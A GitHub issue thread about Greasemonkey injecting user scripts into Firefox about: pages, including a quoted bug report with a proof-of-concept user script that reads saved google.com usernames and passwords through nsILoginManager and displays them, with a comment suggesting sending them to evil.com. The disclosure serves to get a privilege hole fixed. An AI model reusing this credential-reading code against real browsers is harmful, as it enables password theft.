Closed Martii closed 13 years ago
Reported upstream at greasemonkey#1302
monkey menu has been completely refactored and broken as acknowledged in greasemonkey#1306 in this commit forward thus invalidated this report. Still present in GM 0.9.1 release.
Closing as invalidated by greasemonkey@4e5e3ec
Reported upstream in this comment as
monkey menu has been completely refactored and broken, as acknowledged in #1306, by this commit forward thus invalidated this report. Still present in GM 0.9.1 release.
Closing as invalidated-by would be a more proper tag along with commit reference.
Reopened by greasemonkey#1375
LouCypher wrote
Steps to reproduce:
1. Enable "greasemonkey.aboutIsGreaseable" in about:config (set it to true)
2. Install this script
// ==UserScript== // @name Retrieving passwords via about: pages // @namespace http://mozilla.status.net/loucypher // @include about:* // ==/UserScript== var hostname = 'https://www.google.com'; var formSubmitURL = 'https://www.google.com'; // not http://www.example.com/foo/auth.cgi var httprealm = null; var username, password; try { var myLoginManager = Components.classes["@mozilla.org/login-manager;1"]. getService(Components.interfaces.nsILoginManager); var logins = myLoginManager.findLogins({}, hostname, formSubmitURL, httprealm); var info = ""; for (var i = 0; i < logins.length; i++) { info += logins[i].username + "\n"; info += logins[i].password + "\n\n"; } //GM_log(info); alert(info); // show usernames and passwords for google.com // or send to evil.com via XHR (untested) } catch(ex) { // This will only happen if there is no nsILoginManager component class //GM_log(ex); }Expected result:
User script should not have chrome privileges and should not have access to XPCOMs
Actual result:
Display usernames and passwords (could be worse)
Upstream comment
Historical issue reference:
#1302
Upstream comment
arantius wrote:In regards to security I am +1 for this. Moz and other addons are starting to create about: entries of their own and I would really rather not see user.js become a security threat to other add-ons including the Moz core. We could never really handle all of them especially if GM isn't aware of them.
Still thinking we should just drop this feature (injecting into about:s besides blank) altogether.about:blank
had some issues last time I tested it to withdocument.write
but that was a while ago.
Closed by greasemonkey@80c62e8
Original title: Script injection attempted in about:addons
In Firefox 4.x, Greasemonkey attempts to inject a script when @include rule is set to about:addons and user navigates to about:addons which also throws this warning
Sample script
The monkey menu also reflects this attempt as being successfully injected however no alert happens. It is handy to have the popup menu available however it shouldn't reflect nor try to inject a script at this URI.